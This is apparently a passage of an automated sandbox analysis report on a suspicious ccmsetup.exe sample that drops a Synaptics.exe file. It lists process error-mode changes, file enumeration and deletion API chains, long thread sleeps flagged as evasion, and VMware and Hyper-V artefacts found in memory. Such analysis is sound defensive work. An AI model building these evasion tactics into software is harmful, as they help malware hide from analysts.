                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                              Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 3_2_09CB30E4 sldt word ptr [eax]3_2_09CB30E4
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: __EH_prolog3_catch_GS,GetAdaptersInfo,GetCurrentThreadId,GetCurrentThreadId,GetAdaptersInfo,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,2_2_006763D8
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeEvaded block: after key decisiongraph_2-79270
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-75557
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeAPI coverage: 3.3 %
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5736Thread sleep count: 87 > 30Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 5736Thread sleep time: -5220000s >= -30000sJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exe TID: 8656Thread sleep time: -60000s >= -30000sJump to behavior
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0057E422 __EH_prolog3_catch_GS,FindFirstFileW,GetLastError,DeleteFileW,GetLastError,FindNextFileW,FindClose,2_2_0057E422
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005F2842 __EH_prolog3_catch_GS,FindFirstFileW,FindNextFileW,DeleteFileW,GetFileInformationByHandle,GetCurrentThreadId,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,CopyFileW,GetLastError,GetCurrentThreadId,GetLastError,FindClose,2_2_005F2842
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00589401 __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,FindFirstFileW,FindNextFileW,FindClose,2_2_00589401
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0060581F __EH_prolog3_catch_GS,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,FindFirstFileW,GetLastError,GetCurrentThreadId,GetCurrentThreadId,GetCurrentThreadId,CopyFileW,GetLastError,GetCurrentThreadId,FindNextFileW,FindClose,2_2_0060581F
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_00587953 __EH_prolog3_catch_GS,GetCurrentThreadId,FindFirstFileW,FindNextFileW,FindClose,GetCurrentThreadId,2_2_00587953
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_0057DD9A __EH_prolog3_catch_GS,FindFirstFileW,FindNextFileW,FindClose,RemoveDirectoryW,GetLastError,DeleteFileW,GetLastError,GetCurrentThreadId,FindClose,2_2_0057DD9A
                              Source: C:\Users\user\Desktop\._cache_ccmsetup.exeCode function: 2_2_005FB59B __EH_prolog3_catch,GetSystemInfo,GetCurrentThreadId,GetModuleHandleW,GetLastError,GetCurrentThreadId,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,GetLastError,GetCurrentThreadId,GetNativeSystemInfo,GetCurrentThreadId,2_2_005FB59B
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeThread delayed: delay time: 60000Jump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\ccmsetup.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                              Source: Amcache.hve.12.drBinary or memory string: VMware
                              Source: ccmsetup.exe, 00000000.00000003.2037350787.0000000000BC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}o
                              Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                              Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                              Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                              Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                              Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                              Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                              Source: Synaptics.exe, 00000003.00000002.2909324806.000000000070B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2909324806.00000000006C5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                              Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                              Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                              Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                              Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                              Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                              Source: Amcache.hve.12.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
                              Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                              Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                              Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
